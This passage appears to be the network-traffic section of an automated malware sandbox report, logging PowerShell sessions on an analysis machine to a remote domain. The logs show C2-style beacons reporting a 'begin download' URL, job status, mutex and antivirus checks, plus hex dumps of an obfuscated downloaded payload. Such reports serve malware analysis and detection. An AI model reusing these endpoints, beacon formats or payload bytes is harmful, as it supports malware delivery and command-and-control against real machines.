                                                                                      Data Ascii: OC[1mCLDulTUCMSGGvL3GIcIO`T3esVUH4LVKtTVeLW3PvRTSCbDSSbEeDTV8JSGGwRlSHRkWme{CMRTOC[1mEPVeKP1KTVmb0`1mERlm`W3SvXlmB`3H{[IWhS{mnVjOC`3SXRoCK`oONP3esRjqIUo[hcmKrXl4S[0CUPjqhcmq3XUKWeGXxWlmWcW[5[GeVdlSEPYSVVDqvRTORLVOu`3eLWm[7VmWJ`FLxcFqWS1[4X{KreWq7b14E`TGoR


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.11.3049755172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:49 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c3dbc308f4e5560609b6f4a95e HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 308
                                                                                      2024-11-08 09:45:49 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 66 33 66 63 61 62 35 35 61 62 38 35 35 39 35 31 37 38 33 35 62 31 35 63 65 62 38 34 31 61 35 65 34 32 36 33 39 36 61 65 39 32 32 39 62 39 63 64 39 32 64 61 39 38 36 65 36 65 39 30 63 34 62 66 38 36 30 61 31 35 34 63 38 66 61 31 66 39 63 36 33 30 37 32 35 63 30 63 33 31 33 61 62 63 35 38 31 35 64 31 65 65 30 39 36 35 34 34 62 31 30 32 35 61 37 39 35 65 65 64 31 33 36 39 38 62 34 64 34 30 30 33 33 37 62 62 61 31 38 32 62 32 38 65 65 37 61 65 62 65 61 31 61 63 33 37 62 32 61 63 33 36 37 31 64 34 31 66 39 66 33 66 32 31 38 32 35 31 37 35 65 65 63 35 32 37 30 33 34 65 36 35 64 33 34 30
                                                                                      Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860a154c8fa1f9c630725c0c313abc5815d1ee096544b1025a795eed13698b4d400337bba182b28ee7aebea1ac37b2ac3671d41f9f3f21825175eec527034e65d340
                                                                                      2024-11-08 09:45:50 UTC946INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:50 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOZNqn8IT6k%2F2yTrOLqHFj9UjPoKX80ji9397pBaiXCDDeJLU8QKaOM%2FLBCSYfpAmFW3kvgHfJHfmkyOSfWEj7xuAH4TQDyGKLxz3q8b25z6FmpwtXxDzsh2OK%2BKe03hXrjSDSDyexe9"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=23611&sent=23377&recv=12139&lost=0&retrans=0&sent_bytes=32474908&recv_bytes=139631&delivery_rate=57212301&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1e589f5c34e-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102190&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1258&delivery_rate=37452&cwnd=246&unsent_bytes=0&cid=6a7cbf3b593e14ab&ts=816&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.11.3049756172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:50 UTC370OUTGET /file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860a154c8fa1f9c630725c0c313abc5815d1ee096544b1025a795eed13698b4d400337bba182b28ee7aebea1ac37b2ac3671d41f9f3f21825175eec527034e65d3408693d15960269d4f4ad353c7ea53 HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      2024-11-08 09:45:51 UTC1067INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:51 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 21758
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPp%2FOuFrHqaLQfD8hFiVC4FxHVARSsBju9JtcYN%2FIvY8DdrPCeK4Mu32VZLo7kmdHUJ%2Fyzydruy9rTuUfHd%2BoefMs%2BwmpugaxcA8Rci0JM9dzOisBH1u11R3pGcwEmdUJhuCgG7DZ76q"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=27350&sent=23379&recv=12141&lost=0&retrans=0&sent_bytes=32475661&recv_bytes=140638&delivery_rate=57212301&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1ec2c7c2d26-IAD
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=108987&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1008&delivery_rate=35257&cwnd=151&unsent_bytes=0&cid=5051df5c2fe77458&ts=825&x=0"
                                                                                      2024-11-08 09:45:51 UTC302INData Raw: 25 77 74 6d 62 60 62 70 66 78 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 55 4b 4f 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 55 6a 4f 71 50 56 65 4b 50 31 47 76 53 47 47 77 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 4c 47 71 59 4c 59 65 52 63 55 6d 7b 56 6a 65 56 64 54 6d 44 4c 46 65 59 4c 54 35 30 58 7b 4f 52 63 46 4b 55 4f 54 71 54 64 55 57 53 56 57 69 52 63 30 69 54 63 7b 5b 52 4c 6d 58 76 57 6a 65 56 65 46 4f 46 50 6c 69 6a 53 33 65 77 52 30 44 76 52 31 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 30 71 75 63 49 4f 60 57 6a 4b 6e
                                                                                      Data Ascii: %wtmb`bpfx<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#PUKOP1GoRTOC[1mEPVeKP1GoRTOCUjOqPVeKP1GvSGGwUjOoLDuKP1GoRTORLGqYLYeRcUm{VjeVdTmDLFeYLT50X{ORcFKUOTqTdUWSVWiRc0iTc{[RLmXvWjeVeFOFPlijS3ewR0DvR1SSc14E`TGoRTOC`0qucIO`WjKn
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 49 58 6b 4b 35 60 30 71 58 52 56 65 4c 57 54 34 77 58 57 65 35 60 30 57 49 53 6b 43 69 50 31 47 73 54 6c 30 72 62 30 71 57 4f 56 69 68 57 30 57 4e 50 33 6d 43 5b 31 6d 45 50 6f 43 60 60 54 47 77 57 6a 65 56 64 6c 53 45 4c 57 47 5b 56 47 4b 77 52 54 4c 79 54 57 6d 58 54 6c 38 4b 50 30 4b 75 58 57 65 35 63 47 57 49 53 6b 43 69 50 33 75 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 53 6d 5b 47 62 44 38 55 53 6d 5b 59 54 7b 43 46 54 54 6d 45 52 6a 65 69 57 32 69 72 52 54 65 56 4f 46 47 58 55 6b 43 6b 64 6c 38 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 56 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 70 52 54 57 52 63 46 4b 49 57 6b 43 60 54 31 48 76 58 54 65 57 5b 30 71 75 63 49 4f 60 54 55
                                                                                      Data Ascii: IXkK5`0qXRVeLWT4wXWe5`0WISkCiP1GsTl0rb0qWOVihW0WNP3mC[1mEPoC``TGwWjeVdlSELWG[VGKwRTLyTWmXTl8KP0KuXWe5cGWISkCiP3uo[YbvR1mEPVeKP1GoRTOBSm[GbD8USm[YT{CFTTmERjeiW2irRTeVOFGXUkCkdl8oRje`bFKIWmG[VGKwRVbvR1SSc3eKP1GoRTOC[1mEPVeKP1GpRTWRcFKIWkC`T1HvXTeW[0qucIO`TU
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 50 6c 75 60 57 32 69 72 5b 44 65 56 60 31 38 71 50 56 75 60 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 33 6d 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 57 56 30 56 4c 46 53 58 52 6f 57 4b 50 30 48 76 58 33 34 56 63 44 6d 49 63 49 57 60 53 33 79 70 56 57 69 52 62 46 4b 75 58 33 65 6a 53 33 69 72 52 54 65 60 62 46 4b 49 57 56 65 6a 4c 6a 5b 37 52 54 65 60 65 6c 53 59 4f 56 75 4b 53 31 5b 30 56 6a 4f 42 60 30 71 59 64 46 79 6a 53 30 5b 73 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6f 6d 60 56 47 48 79 58 33 31 31 5b 31 71 48 54 6f 6d 6a 57 30 57 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 44 76 52 31 53
                                                                                      Data Ascii: Plu`W2ir[DeV`18qPVu`cVy{Vm[B`FSI[3mDTV8oRTOC[1mEPVeKP1GoRTOCUjOqPVeKP1GoRTOC[1mEPVeKP10oWV0VLFSXRoWKP0HvX34VcDmIcIW`S3ypVWiRbFKuX3ejS3irRTe`bFKIWVejLj[7RTe`elSYOVuKS1[0VjOB`0qYdFyjS0[sSGGw[1mEPVeKP1GoRTOC[1mEPom`VGHyX311[1qHTomjW0WNP3mC[1mEPVeKP1Go[mDvR1S
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 57 5b 5b 5b 31 71 45 5b 33 75 5b 57 7b 54 76 58 57 69 60 62 46 4f 74 57 6b 43 4c 63 57 4b 76 58 7b 4f 42 62 30 6d 58 63 44 38 5b 57 7b 47 72 52 30 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 72 64 6d 5b 57 53 6a 53 54 4c 31 4b 72 58 6c 6d 43 4e 54 6d 45 60 44 69 60 56 47 47 31 54 30 69 52 63 46 4b 56 50 6f 6d 68 4c 31 4b 72 58 33 34 52 4f 54 6d 47 60 44 79 54 53 55 40 33 56 44 5b 35 57 47 50 76 56 6d 57 56 4c 44 5b 55 54 6d 5b 35 58 30 53 59 63 46 71 6b 63 55 6d 37 58 6b 4b 60 4c 47 69 46 64 47 69 69 57 7b 57 73 58 6b 4f 6a 64 6d 69 46 64 44 53 6a 56 44 71 34 56 6d 62 30 4c 47 5b 75 57 6f 6d 6b 4c 6c 79 33 58 6c 79 35 58 30 57 49 4e 59 4f 69 57 31 34 76 56 6d 69 4e 58 30 69 46 55 6b 57 6b 4c 30 4b 72 58 6d 4f 73 65 57 4b 59 4f 56 69 5b 63 59 69 72
                                                                                      Data Ascii: W[[[1qE[3u[W{TvXWi`bFOtWkCLcWKvX{OBb0mXcD8[W{GrR0OKO1SSc3eKP1GoRjerdm[WSjSTL1KrXlmCNTmE`Di`VGG1T0iRcFKVPomhL1KrX34ROTmG`DyTSU@3VD[5WGPvVmWVLD[UTm[5X0SYcFqkcUm7XkK`LGiFdGiiW{WsXkOjdmiFdDSjVDq4Vmb0LG[uWomkLly3Xly5X0WINYOiW14vVmiNX0iFUkWkL0KrXmOseWKYOVi[cYir
                                                                                      2024-11-08 09:45:51 UTC517INData Raw: 5b 53 57 6c 76 7b 54 57 53 4e 50 6d 4b 49 5b 44 4b 59 63 44 5b 42 55 6a 57 46 53 57 6a 76 53 6d 71 60 4c 44 71 77 54 57 57 6a 56 6d 47 56 63 46 34 53 63 56 79 42 54 6b 47 72 50 6d 65 59 5b 44 4f 68 53 54 5b 47 56 55 43 46 56 6c 50 76 52 6f 4b 53 57 57 4b 4e 54 57 5b 76 50 6d 47 58 63 44 4b 52 4c 57 5b 42 57 30 65 6a 50 6a 30 73 53 6a 57 55 57 54 5b 51 57 57 57 4a 62 30 47 57 54 6d 71 53 57 55 6d 52 54 57 69 6a 50 6d 4b 47 53 6a 4b 59 56 46 53 42 5b 56 75 46 53 57 65 57 53 6c 47 60 4c 44 57 37 54 57 57 6a 57 6d 47 57 4f 54 4b 53 63 56 79 42 54 6a 5b 72 50 6d 53 73 53 6a 4b 4f 4c 44 5b 48 57 6d 57 46 58 57 47 57 52 6f 53 53 57 57 4b 60 54 57 54 34 54 6d 47 58 5b 44 4b 52 53 31 34 42 57 46 34 6a 50 6c 50 76 53 6a 57 55 57 54 5b 69 54 57 57 47 64 57 47 57 5b
                                                                                      Data Ascii: [SWlv{TWSNPmKI[DKYcD[BUjWFSWjvSmq`LDqwTWWjVmGVcF4ScVyBTkGrPmeY[DOhST[GVUCFVlPvRoKSWWKNTW[vPmGXcDKRLW[BW0ejPj0sSjWUWT[QWWWJb0GWTmqSWUmRTWijPmKGSjKYVFSB[VuFSWeWSlG`LDW7TWWjWmGWOTKScVyBTj[rPmSsSjKOLD[HWmWFXWGWRoSSWWK`TWT4TmGX[DKRS14BWF4jPlPvSjWUWT[iTWWGdWGW[
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 52 54 57 53 4e 50 6d 48 79 63 44 4b 59 57 33 53 42 55 54 57 46 53 57 57 57 53 6a 38 53 57 54 57 32 54 57 57 6a 56 6d 47 56 63 47 4b 53 63 59 53 42 54 6a 54 79 50 6d 53 72 53 6a 4b 4f 53 54 5b 47 57 30 57 46 54 47 47 57 52 6f 4b 53 57 56 53 4a 54 57 54 30 54 6d 47 54 52 6a 4b 52 4c 47 5b 42 57 47 65 6a 50 33 47 57 53 6a 57 60 4c 44 5b 51 57 57 57 4a 62 30 47 57 54 6d 5b 53 57 55 57 74 54 57 53 52 50 6d 4b 47 53 6a 4b 54 56 46 53 42 5b 45 43 46 53 57 53 57 53 6d 71 6a 4c 44 54 76 54 57 57 6a 54 6d 47 56 63 47 4b 53 63 56 79 42 54 6a 5b 56 50 6d 65 75 5b 44 4b 4e 53 54 5b 48 54 30 57 46 55 30 47 57 53 55 47 53 57 57 4b 4a 54 57 54 79 4c 30 47 54 50 6a 4b 52 53 54 5b 42 57 46 30 6a 50 33 47 57 53 6a 69 56 57 54 5b 4e 56 6b 43 4a 63 30 47 57 54 6a 34 53 57 55
                                                                                      Data Ascii: RTWSNPmHycDKYW3SBUTWFSWWWSj8SWTW2TWWjVmGVcGKScYSBTjTyPmSrSjKOST[GW0WFTGGWRoKSWVSJTWT0TmGTRjKRLG[BWGejP3GWSjW`LD[QWWWJb0GWTm[SWUWtTWSRPmKGSjKTVFSB[ECFSWSWSmqjLDTvTWWjTmGVcGKScVyBTj[VPmeu[DKNST[HT0WFU0GWSUGSWWKJTWTyL0GTPjKRST[BWF0jP3GWSjiVWT[NVkCJc0GWTj4SWU
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 4f 54 4b 53 57 7b 6d 42 54 30 57 46 50 6d 6e 76 53 6a 53 53 57 54 5b 4a 54 57 57 46 62 6d 47 57 5b 45 4f 53 57 31 6e 7b 54 56 31 30 50 6d 4b 54 50 6a 4b 59 63 44 5b 45 5b 56 75 46 52 57 53 57 53 6d 71 57 57 54 71 30 54 57 57 6a 57 6d 47 59 55 6b 4f 53 57 33 53 42 54 55 4f 4e 50 6d 57 46 53 6a 4b 60 4c 44 5b 44 57 57 57 46 60 6c 50 76 52 59 65 53 57 56 69 4a 54 57 65 46 54 6d 47 74 57 6a 4b 52 4c 6a 34 42 57 57 65 6a 50 33 53 73 53 6a 69 57 57 54 5b 72 57 57 57 47 4c 30 47 57 53 59 65 53 57 54 34 74 54 57 65 6a 50 6d 44 76 53 6a 4b 55 57 54 5b 42 56 6b 43 46 53 47 57 57 53 6c 6d 53 57 54 6e 78 54 57 57 6a 60 6d 47 56 54 6d 4b 53 63 59 69 42 54 31 54 79 50 6d 6a 7b 5b 44 4f 69 53 54 5b 48 56 55 43 46 58 57 57 57 52 6b 5b 53 57 54 34 42 54 57 57 31 4c 30 47
                                                                                      Data Ascii: OTKSW{mBT0WFPmnvSjSSWT[JTWWFbmGW[EOSW1n{TV10PmKTPjKYcD[E[VuFRWSWSmqWWTq0TWWjWmGYUkOSW3SBTUONPmWFSjK`LD[DWWWF`lPvRYeSWViJTWeFTmGtWjKRLj4BWWejP3SsSjiWWT[rWWWGL0GWSYeSWT4tTWejPmDvSjKUWT[BVkCFSGWWSlmSWTnxTWWj`mGVTmKScYiBT1TyPmj{[DOiST[HVUCFXWWWRk[SWT4BTWW1L0G
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 55 43 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 44 54 57 57 46 52 6d 47 57 52 6a 75 53 57 56 4c 76 54 57 65 52 63 6d 47 74 56 6a 4b 52 4c 31 34 42 57 33 79 46 50 6c 53 47 53 6a 65 5b 4c 44 5b 69 57 57 57 4a 62 47 47 57 56 6a 71 53 57 6f 43 52 54 56 34 6e 50 6d 4f 46 57 6a 4b 59 63 44 5b 45 5b 56 75 46 52 57 57 57 53 6a 71 53 57 54 58 76 54 57 57 60 57 6d 47 59 55 6c 34 53 63 6a 4b 42 54 55 43 46 50 6d 4f 73 53 6a 4f 4f 57 54 5b 4b 54 30 57 46 60 47 57 57 53 6c 34 53 57 54 30 32 54 57 5b 52 54 6d 47 75 64 44 4b 55 53 6a 5b 42 56 57 57 46 50 33 53 73 53 6a 69 57 57 54 5b 4a 54 57 57 4a 54 6d 47 57 58 7b 53 53 57 31 35 7b 54 56 71 42 50 6d 44 76 53 6a 4b 54 53 6a 5b 45 54 30 57 46 52 47 5b 57 53 6d 71 57 57 54 71 78 54 57 57 6a 57 6d 47 59 55 6c 34 53 63 6f 43 42
                                                                                      Data Ascii: UCFPmOWSjK`LD[DTWWFRmGWRjuSWVLvTWeRcmGtVjKRL14BW3yFPlSGSje[LD[iWWWJbGGWVjqSWoCRTV4nPmOFWjKYcD[E[VuFRWWWSjqSWTXvTWW`WmGYUl4ScjKBTUCFPmOsSjOOWT[KT0WF`GWWSl4SWT02TW[RTmGudDKUSj[BVWWFP3SsSjiWWT[JTWWJTmGWX{SSW15{TVqBPmDvSjKTSj[ET0WFRG[WSmqWWTqxTWWjWmGYUl4ScoCB
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 4b 55 57 54 5b 42 55 30 57 46 53 47 47 57 53 6a 75 53 57 54 71 79 54 57 57 6b 4f 47 47 59 52 6c 34 53 60 6a 4b 42 54 6b 47 56 50 6d 6d 75 5b 44 4f 4f 53 54 5b 44 55 6a 57 46 56 6c 50 76 52 6b 4b 53 57 56 4c 76 54 57 65 52 50 6d 47 75 64 44 4b 52 64 6d 4b 42 56 6a 57 46 50 6a 35 76 53 6a 4b 4f 53 54 5b 44 56 6b 43 46 63 6d 47 57 55 6a 4b 53 57 56 79 42 54 57 65 6a 50 6d 44 76 53 6a 4b 55 57 54 5b 42 56 6b 43 46 53 47 47 57 53 6c 47 60 4c 44 6e 78 54 57 57 6e 52 6d 47 57 63 44 4b 53 57 7b 6d 42 54 55 47 46 50 6d 6d 56 53 6a 4b 60 4c 44 5b 47 55 54 57 46 52 6d 47 57 53 6b 4f 53 57 57 4b 37 54 57 57 72 50 6d 47 59 65 44 4b 52 4c 6f 53 42 54 30 57 46 50 6c 53 47 53 6a 69 6a 4c 44 5b 73 54 57 57 46 63 6d 47 57 55 6d 4b 53 57 6c 79 74 54 56 71 56 50 6d 4f 46 53
                                                                                      Data Ascii: KUWT[BU0WFSGGWSjuSWTqyTWWkOGGYRl4S`jKBTkGVPmmu[DOOST[DUjWFVlPvRkKSWVLvTWeRPmGudDKRdmKBVjWFPj5vSjKOST[DVkCFcmGWUjKSWVyBTWejPmDvSjKUWT[BVkCFSGGWSlG`LDnxTWWnRmGWcDKSW{mBTUGFPmmVSjK`LD[GUTWFRmGWSkOSWWK7TWWrPmGYeDKRLoSBT0WFPlSGSjijLD[sTWWFcmGWUmKSWlytTVqVPmOFS
                                                                                      2024-11-08 09:45:51 UTC1369INData Raw: 46 50 6d 4c 76 53 6a 4b 69 4c 44 5b 75 57 57 57 46 55 30 47 57 53 6f 5b 53 57 30 71 52 54 57 54 30 50 6d 47 59 4e 54 4b 52 53 6a 5b 42 54 7b 43 46 50 6a 30 47 53 6a 53 60 4c 44 54 34 52 56 6d 73 4f 31 53 53 63 33 65 4b 50 31 47 6f 5b 6d 44 76 52 31 6d 45 50 56 65 4b 53 30 5b 7b 58 7b 4b 57 55 6a 4f 71 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 57 56 57 57 4f 73 4f 54 6d 56 57 6d 71 4c 54 57 5b 43 5b 31 6d 75 52 6b 57 6b 53 31 5b 37 58 32 6d 42 4c 57 6d 59 55 56 65 6b 63 6d 5b 30 52 54 65 4e 65 47 71 45 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6a 35 76 56 57 69 4a 4c 44 79 58 50 6f 6d 68 4c 6a 34 72 58 7b 4f 4f 5b 31 6d 74 50 6f 5b 6a 4c 6d 5b 34 58 7b 4b 6e 63 46 4b 49 65 32 57 60 56 46 69 72 52 56
                                                                                      Data Ascii: FPmLvSjKiLD[uWWWFU0GWSo[SW0qRTWT0PmGYNTKRSj[BT{CFPj0GSjS`LDT4RVmsO1SSc3eKP1Go[mDvR1mEPVeKS0[{X{KWUjOqPVeKP1H2SGGw[1mEPVeKP1GoRTWVWWOsOTmVWmqLTW[C[1muRkWkS1[7X2mBLWmYUVekcm[0RTeNeGqERUeDTV8oRTOC[1mEPVeKSj5vVWiJLDyXPomhLj4rX{OO[1mtPo[jLm[4X{KncFKIe2W`VFirRV


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.11.3049757172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:52 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 85
                                                                                      2024-11-08 09:45:52 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                      2024-11-08 09:45:53 UTC948INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:53 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zN1s7xW4qhVksVxrCiRJ%2B1710E6iclfrGISoOMXnyGGm9GuD9phKT9Cvkyvn9DcTExe2yZwuP7Kly0qPhLlI%2Bbo%2FYgsVmBehOTHSiW9Oz7xO57QqSJ5l%2BBqHxXVUfxQX0NauZc6VzHWK"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=11648&sent=23397&recv=12150&lost=0&retrans=0&sent_bytes=32498279&recv_bytes=141514&delivery_rate=57212301&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a1f9bfb02016-IAD
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=108760&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1034&delivery_rate=35194&cwnd=132&unsent_bytes=0&cid=f10c43de89b3c013&ts=813&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.11.3049758172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:53 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 86
                                                                                      2024-11-08 09:45:53 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                      2024-11-08 09:45:54 UTC927INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:54 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JOn9HRUDNHBohYyKUblxCTlXP%2Bojvrg22a0uDLOvy49c9Irz1IKPvRWyVReY1c3tZkt5CdpTkbXHVyyRsON1AUk%2BFmDVkkGR8I4iMk%2FLph1bbKRqPFzWsC5DPtFVGWeG06M9ut3oV8nt"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=8754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=730&recv_bytes=2132&delivery_rate=23879&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2008e790f9f-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102518&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1035&delivery_rate=37479&cwnd=252&unsent_bytes=0&cid=3dcf32a776d23a91&ts=852&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.11.3049759172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:54 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 62
